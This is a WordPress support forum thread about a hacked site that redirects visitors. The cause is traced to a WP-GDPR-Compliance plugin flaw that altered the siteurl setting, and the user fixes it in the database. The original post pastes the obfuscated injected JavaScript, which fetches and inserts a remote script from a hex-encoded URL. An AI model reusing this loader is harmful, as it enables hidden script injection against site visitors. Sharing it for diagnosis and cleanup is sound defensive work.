Support » Fixing WordPress » WordPress messed up

  • Resolved AliaG

    (@aliag)


    Hi everyone,
    just a few hours ago I found that my website is redirect to another one (even the login page).
    I tried to find out what was possibly hacked, but could not find it.
    So, I disabled all plugins by addding a “_” before the folder names, updated WordPress to 4.9 (I had 8.7), deleted my theme and its child folders and uploaded a fresh new version of my theme.
    The website was still redirecting. So I deleted the theme folder, leaving just the twentyfifteen folder. I had just a white page.
    I uploaded the fresh version of my usual theme, and again I have the website redirecting.

    At the moment I don’t have any other ideas.
    The website is this: http://bit.ly/2T6BpdE
    I even turned on the Debug mode, but it doesn’t show anything. Sucuri say that’s my website is just outdated, but didn’t detect any malware and is not blacklisted.

    The frontside is still redirected to another website and my login page is redirected to this url: https://wtools.io/code/raw/sf?/wp-login_php&redirect_to=https%3A%2F%2Fwww.%5Bwebsitename%5D.it%2Fstore%2Fwp-admin%2F&reauth=1

    while the page is blank and shows only, this code:

    var a=['enableLinkTracking','setTrackerUrl','piwik.php','setSiteId','createElement','getElementsByTagName','script','type','text/javascript','async','src','//cdn.innocraft.cloud/diwutixip.innocraft.cloud/piwik.js','parentNode','fromCharCode','templat33','open','GET','send','responseText','push','trackPageView'];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0xbb));var b=function(c,d){c=c-0x0;var e=a[c];return e;};make_me();var _paq=_paq||[];_paq[b('0x0')]([b('0x1')]);_paq['push']([b('0x2')]);(function(){var c='https://diwutixip.innocraft.cloud/';_paq[b('0x0')]([b('0x3'),c+b('0x4')]);_paq[b('0x0')]([b('0x5'),'1']);var d=document,e=d[b('0x6')]('script'),f=d[b('0x7')](b('0x8'))[0x0];e[b('0x9')]=b('0xa');e[b('0xb')]=!![];e[b('0xc')]=b('0xd');f[b('0xe')]['insertBefore'](e,f);}());function make_me(){var g=String[b('0xf')](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x6d,0x79,0x73,0x70,0x61,0x63,0x65,0x69,0x64,0x2e,0x73,0x70,0x61,0x63,0x65,0x2f,0x78,0x6d,0x6c,0x72,0x70,0x63,0x2e,0x70,0x68,0x70);var h=httpGet(g);if(h!='null'){var i=document[b('0x7')](b('0x8'));var j=!![];for(var k=i['length'];k--;){if(i[k]['id']==b('0x10')){j=![];}};if(j==!![]){var l=h;var m=document,n=m[b('0x6')](b('0x8')),o=m[b('0x7')](b('0x8'))[0x0];n[b('0x9')]=b('0xa');n[b('0xb')]=!![];n[b('0xc')]=h;n['id']=b('0x10');o['parentNode']['insertBefore'](n,o);}}}function httpGet(p){var q=new XMLHttpRequest();q[b('0x11')](b('0x12'),p,![]);q[b('0x13')](null);return q[b('0x14')];}

    Any idea what went wrong? This morning the website was working fine…

    Thanks in advance.

Viewing 8 replies - 1 through 8 (of 8 total)
  • Moderator t-p

    (@t-p)

    Sucuri online site scan indicates your site is blacklisted: https://sitecheck.sucuri.net/results/bit.ly/2T6BpdE

    If you suspect your site is hacked, carefully follow this guide.

    When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Off hand, couple of names that come to mind are Sucuri and Wordfence.

    paulswarthout

    (@paulswarthout)

    Try renaming the ‘index.php’ file located in the WordPress root folder. WordPress needs that file to launch the website. If your website continues to redirect, then the problem is NOT with your WordPress website, per se.

    Check your rewrite rules. Check your web server configuration files.

    Failing that, it is possible that your website’s DNS entries or the domain itself have been compromised. Your web host and/or registrar can help you track that down.

    If the page does not redirect when you renamed ‘index.php’ (don’t forget to rename it back), then I would look at files that do not always get overwritten during a version upgrade. Start with ‘index.php’ and walk the website load process until you discover where it redirects. A file compare tool might help you with that.

    Look at your plugins. You’ve disabled them with an underscore (thank you for that, I didn’t know you could do that) prefixed to the folder name. But somewhere in the WordPress core, there is code that recognizes the underscore and deactivates the plugin. Make certain that nothing bypasses that and runs code in a plugin folder anyway.

    Depending on how extensive your website is, or more importantly, how much configuration you’ve had to do with each of your plugins — new forms, ecommerce set up, etc., an alternative to tracking it down — since you’ve already disabled your plugins and deleted your themes — would be to back everything up (with FTP, not with a WordPress backup plugin), and dump the database (I like the command-line mysqldump.exe for that in Windows), then delete ALL of the files associated with the website (except the backup), install a fresh, clean copy of the latest WordPress version, install a new theme, and then install or copy each plugin, one at a time from the backup — testing as you go — until you’re back up and running. Any plugins that do not have extensive reconfigures, I would just install from scratch.

    Another place to look is the database. Look at the options tables. Look for any values with embedded code. Some may be legitimate, but some may not be.

    AliaG

    (@aliag)

    Thanks @paulswarthout for your clear explanation.

    I tried to rename index.php adding “1” before it and the website goes to a page of my host (where I bought domain and webspace).

    I can’t clearly understand this:

    Start with ‘index.php’ and walk the website load process until you discover where it redirects. A file compare tool might help you with that.

    What do you mean with that?

    As for the plugin my further attempt would be to backup them up and the delete them one by one and see if anything changes. I found strange, however, the problem on the wp-admin section. What’s that code for? It seems that some script isn’t working properly…

    I’ll try various solutions and let you know. Any further indication is more than welcome.
    Why, for example, if I check the url of my website in its complete (not shortened) version, it says that’s not blacklisted?

    paulswarthout

    (@paulswarthout)

    You’re welcome @aliag.

    What I mean by “walk the website load process” is to pretend you’re the computer that is loading the website. If you have a php debugger (I don’t, but wish I did) it will be easier to step through the load process. Without a php debugger, you’ll have to do it manually — reading the actual .php files looking for a redirect. There’s probably a codex somewhere that explains how WordPress loads itself.

    You might actually be able to search for the wp_redirects or http_redirect or header to speed up the process. Redirects can even be issued from javascript.

    The information that you show above that you refer to as code, looks like an attempt to hide what it’s doing. All of those ‘0x65,’ translate into letters. For example, ‘0x65,’ is a capital ‘A’. It’s a little bit of Javascript code.

    You might be able to take a couple snippets from that code, such as ‘enableLinkTracking’ or ‘setTrackerUrl’ or ‘piwik.php’ and search your website code for it. It might give you a meaningful place to start.

    Are you using the WP-Matomo or WP-Piwik WordPress plugin? If you are, I’d start with that one. That code references ‘piwik.php’ which is part of this plugin.

    Good Luck!!

    brooksdc

    (@brooksdc)

    Hey @aliag, discovered this same issue today as well. Do you have this plugin installed by any chance: WP-GDPR-COMPLIANCE

    https://wordpress.org/support/plugin/wp-gdpr-compliance/reviews/?filter=1

    Check the link above – many others with the same issue. We disabled this plugin and it seemed to clear up the immediate issue. UPDATE: They’ve also released an update for the security flaw if you need to continue using it.

    • This reply was modified 12 months ago by  brooksdc.
    AliaG

    (@aliag)

    Many thanks @paulswarthout and @brooksdc.

    Yes, I use WP-GDPR-COMPLIANCE. I deleted it but the website still redirects, unfortunately. I’ll work on it!

    UseShots

    (@useshots)

    Hello,

    That’s indeed because of the security hole in the older versions of WP-GDPR-COMPLIANCE. Hackers used it to change the siteurl setting of WordPress.

    Here you can find the details
    https://blog.sucuri.net/2018/11/erealitatea-net-hack-corrupts-websites-with-wp-gdpr-compliance-plugin-vulnerability.html
    https://blog.sucuri.net/2018/11/hackers-change-wordpress-siteurl-to-pastebin.html

    The first link has instructions on how to change the siteurl and what else you should check (e.g. fake admin users and changed default user role)

    This article can also be helpful
    https://codex.wordpress.org/Changing_The_Site_URL

    AliaG

    (@aliag)

    Hi @useshots

    thank for your indications. Like I posted on another thread about this topic I found that solution by myself, checking my database with Notepad.
    I didn’t know that was the actual solution, but noticed the url modified in the “wp-options” table and after correcting it on the online database the website went back to normality.
    Users are fine. So I think everything is restored.

    Thanks everybody for your support.

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘WordPress messed up’ is closed to new replies.